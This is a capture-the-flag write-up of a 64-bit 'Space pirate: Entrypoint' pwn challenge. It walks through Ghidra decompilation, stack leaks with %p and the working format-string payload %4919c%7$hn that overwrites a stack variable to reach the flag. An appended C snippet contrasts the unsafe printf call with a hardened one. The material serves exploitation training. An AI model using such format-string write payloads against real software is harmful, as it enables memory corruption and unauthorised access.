Space pirate: Entrypoint
A standard FSB challenge
Initial Impressions
We are given a 64-bit binary file that upon running gives us two options.
┌──(kali㉿kali)-[~/Desktop/CTF/PWN/htb_spacepirate_entrypoint]
└─$ ./sp_entrypoint
Authentication System
[ASCII-art banner omitted]
1. Scan card 💳
2. Insert password ⏪️
>
Looking at the decompiled main function in Ghidra, we find two functions of interest: open_door and check_pass.
undefined8 main(void)
{
  long lVar1;
  long in_FS_OFFSET;
  long local_48;
  long *local_40;
  char local_38 [40];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);   /* stack canary */
  setup();
  banner();
  local_48 = 0xdeadbeef;                        /* value that gates open_door() */
  local_40 = &local_48;                         /* a pointer to local_48 also sits on the stack */
  printf(&DAT_001025e0);
  lVar1 = read_num();
  if (lVar1 != 1) {
    if (lVar1 == 2) {
      check_pass();
    }
    printf(&DAT_00102668,&DAT_0010259a);
    /* WARNING: Subroutine does not return */
    exit(0x1b39);
  }
  printf("\n[!] Scanning card.. Something is wrong!\n\nInsert card\'s serial number: ");
  read(0,local_38,0x1f);                        /* up to 31 bytes of user input */
  printf("\nYour card is: ");
  printf(local_38);                             /* user input used directly as the format string */
  if (local_48 == 0xdead1337) {
    open_door();
  }
  else {
    printf(&DAT_001026a0,&DAT_0010259a);
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
  /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}
The open_door() function prints the flag for us, while the check_pass() function authenticates us if our input is 0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455.
void check_pass(void)
{
  int iVar1;
  long in_FS_OFFSET;
  undefined8 local_28;
  undefined8 local_20;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);   /* stack canary */
  local_28 = 0;
  local_20 = 0;
  printf("[*] Insert password: ");
  read(0,&local_28,0xf);                        /* reads at most 15 bytes */
  iVar1 = strncmp("0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455",(char *)&local_28,0x21);   /* compares 33 bytes */
  if (iVar1 != 0) {
    printf(&DAT_001025a8,&DAT_0010259a);
    /* WARNING: Subroutine does not return */
    exit(0x1b39);
  }
  open_door();
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}
However, that path is impossible: read() accepts at most 15 bytes of input (0xf), while strncmp compares 0x21 (33) bytes, the full length of the passphrase.
Looking back at the main function, we see a possible FSB (format string bug) vulnerability on lines 27 and 29, where our input is passed directly to printf as the format string.
This can be tested with %p, which leaks a value from the stack.
1. Scan card 💳
2. Insert password ⏪️
> 1
[!] Scanning card.. Something is wrong!
Insert card's serial number: %p
Your card is: 0x7ffde61a8660
We can also see that local_48, the variable declared earlier and set to 0xdeadbeef, lives on the stack.
Exploit
To successfully get the flag, we need to:
1. Leak the location of the pointer to local_48 on the stack
2. Overwrite the contents of local_48 to equal 0xdead1337 to pass the check
Using %p.%p.%p.%p.%p.%p.%p, we can see that local_48 is at the 6th position on the stack.
Insert card's serial number: %p.%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7ffde61a8660.0x7fab257ed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7ffde61aad00.0x70252e70252e7025
With pwndbg, we can see that the pointer to local_48 is at the 7th position on the stack (0x7fffffffdc68), pointing to 0x7fffffffdc60.
00:0000│ rsp 0x7fffffffdc58 —▸ 0x555555400d78 (main+130) ◂— lea rdi, [rip + 0x18d9]
01:0008│     0x7fffffffdc60 ◂— 0xdeadbeef
02:0010│     0x7fffffffdc68 —▸ 0x7fffffffdc60 ◂— 0xdeadbeef
03:0018│ rsi 0x7fffffffdc70 —▸ 0x7ffff7c10b40 ◂— push rbp
04:0020│     0x7fffffffdc78 ◂— 0x0
05:0028│     0x7fffffffdc80 —▸ 0x555555400e20 (__libc_csu_init) ◂— push r15
06:0030│     0x7fffffffdc88 —▸ 0x555555400940 (_start) ◂— xor ebp, ebp
07:0038│     0x7fffffffdc90 —▸ 0x7fffffffdd80 ◂— 0x1
pwndbg> continue
Continuing.
%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7fffffffb5c0.0x7ffff7bed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7fffffffdc60
We can then use %hn to overwrite the low half-word (2 bytes, the beef part) of 0xdeadbeef. Printing %4919c first emits 4919 characters, which is 0x1337 in hex, making local_48 = 0xdead1337.
The %n specifier takes a pointer (memory address) and writes there the number of characters written so far; the h modifier makes it a 2-byte (short) write. If we can control the input, we can control how many characters are written and also where we write to.
This makes our final payload %4919c%7$hn, with 7$ selecting the 7th stack argument (the pointer to local_48) and hn performing a 2-byte write over the beef portion of 0xdeadbeef which we are trying to overwrite.
Insert card's serial number: %4919c%7$hn
Your card is: �
[+] Door opened, you can proceed with the passphrase: HTB{g4t3_0n3_d4rkn3e55_th3_w0rld_0f_p1r4t35}
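As an added example that is not part of the original writeup (the function names are my own): the unsafe call pattern from main beside its hardened form, an input check that counts conversion specifiers, and a literal-format demonstration of why %4919c followed by %hn stores 0x1337.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for printf(local_38) in the decompiled main(): the serial itself
 * is the format, so "%p" would read a stack slot and "%n" would write memory.
 * Kept only for the side-by-side comparison; only ever call it with plain text. */
static const char *vulnerable_echo(const char *serial)
{
    static char out[64];
    snprintf(out, sizeof out, serial);      /* -Wformat-security flags this */
    return out;
}

/* Hardened form: the format is a literal and the serial is only ever a %s
 * argument, so any '%' in the input is copied verbatim, never interpreted. */
static const char *safe_echo(const char *serial)
{
    static char out[64];
    snprintf(out, sizeof out, "\nYour card is: %s", serial);
    return out;
}

/* Input check for data that must never reach a format argument: counts
 * conversion specifiers ("%%" is a literal percent and is not counted). */
static int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++)
        if (*s == '%') { if (s[1] == '%') s++; else n++; }
    return n;
}

/* Why %4919c followed by %hn lands 0x1337: %*c emits `width` characters, then
 * %hn stores the running count into a 16-bit short (literal format, real args). */
static unsigned short hn_count_for_width(int width)
{
    char buf[8192];                         /* room for width <= 8190 */
    short written = 0;
    snprintf(buf, sizeof buf, "%*c%hn", width, 'A', &written);
    return (unsigned short)written;
}

int main(void)
{
    printf("[%s]\n", safe_echo("%p.%p"));                    /* printed as text */
    printf("%d specifiers\n", count_conversions("%4919c%7$hn"));
    printf("0x%04x\n", hn_count_for_width(4919));            /* 0x1337 */
    return 0;
}
```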